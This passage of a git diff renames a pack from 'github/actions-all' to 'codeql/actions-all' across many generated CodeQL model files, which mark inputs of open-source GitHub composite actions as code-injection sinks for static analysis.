data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 9314532b4263..95b63bfadd0d 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 961ad291c0d3..88da6f066378 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index d2a963c237e2..841140aa12e8 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 809fde338779..04657e223adb 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 002a93c12498..7541c5b8dabe 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 67404b9f3118..2f4033d0825f 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index e4eb1d83db2c..aeed286a882a 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index fc29f5fc8ff3..4d980520bc32 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 352d2550b897..265179054337 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 954216bb04ea..af31a4267fda 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index dcb267331603..6317a72443c0 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 4608da8fe61f..3b2bcb74bb62 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index e38ba9b4edf9..320eabd533c6 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 48a1bb5ca8b8..3af9358c65e9 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 744b025fa655..a61edccecf87 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index d6c91a3853ca..2f7f8c150300 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index e49d896bce08..72601a404073 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 66240fb41c37..6808b4a28933 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index e9fbe3a29507..93c348e570a8 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index bd94706b140a..31be17adf41b 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 39324776e809..89f2daede979 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 80c781f72df7..ce881a46225d 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index abee0f74453d..cd422d4278d1 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 9a20261be903..82d25587bf99 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index a8c9d3fabcee..e6c66721c3f0 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index c222d5e1fd95..668e681473df 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 0a8427f29e4f..13c965ae30a3 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index 52a2001db13a..726aab85e84e 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 28d8cabc3684..4325315c595d 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index f3ef49171464..11da4a457089 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 6150422d177f..4064d556702f 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index ad99ed2b432a..c8d29fbe9f9c 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 5df1a5f22302..5be8efeee399 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index b2c5857a743a..4b4e290a9cba 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 93996601c8af..6f56ef896d3d 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index c1d90d6ab0a8..1520e1fa3b12 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index d29d4d5674d5..2d0a5e4f6d6c 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0aaacca4805c..c4224e600572 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index b69a77400798..b452fb2ebd53 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6ab3f7d2bf57..e75842caa3f2 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index f5ce35d96ad5..53a35fdd9d92 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 519adffb097b..ca216f3b0912 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 69d0355d7202..25107038af5f 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 97a694393759..04132df42bf5 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 54e557061dfb..ca7d52c45a96 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 12ed97f6af51..3e42add86504 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 2c64a6978afe..c0b4d00d5e5a 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index f7982d2244a4..505790a2c9ad 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 9678f3204257..ebb4ebff5e30 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 2ee43fbcf6cd..fcac2d1554da 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 2560e80f52c4..a4fc1bd993de 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 17e4f893d390..6831b4406bc7 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index dde14bfa277d..c669f9be2f89 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 0aabf2e1d7f1..ef7bf632aee7 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 